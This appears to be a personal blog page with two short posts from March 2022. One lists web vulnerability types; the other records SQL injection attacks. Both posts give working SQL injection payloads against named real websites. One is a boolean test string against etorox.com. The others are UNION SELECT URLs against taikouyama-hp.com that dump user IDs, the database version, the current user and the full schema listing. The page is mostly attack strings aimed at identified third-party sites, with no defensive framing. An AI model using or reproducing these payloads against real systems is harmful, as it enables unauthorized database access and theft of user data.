Posts

Showing posts from March, 2022

I know vulnerability

1. hostile subdomain takeover 2. SPF ---- Mail 3. XSS 4. SQLI 5. CSRF 6. Critical File Found 7. Source code disclosed  8. Insecure CORS -- access-control-allow-origin  40327381' or 6257=6259-- https://etorox.com/wallet-faq/?1%27=1
5 comments
Read more

site

  http://www.taikouyama-hp.com/webpage.php?gid=2 http://www.taikouyama-hp.com/webpage.php?gid=-2  Union Select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user_id),null from suser_data http://www.taikouyama-hp.com/webpage.php?gid=-2  Union Select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,Concat($${5UN5H1N3}$$,$$<br>$$,$$VERSION :: $$,version(),$$<br>$$,$$DATABASE ::$$,current_database(),$$<br>$$,$$USER :: $$,current_user,$$<br>$$,$$<br>$$,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,$$::$$,column_name)::TEXT),$$<li>$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$information_schema$$,$$pg_catalog$$))),null https://github.com/bountyhunter09 https://drive.google.com/drive/folders/1Z7LM01vsmelQLPifOa4PU9S8dV8t6OkK?f
3 comments
Read more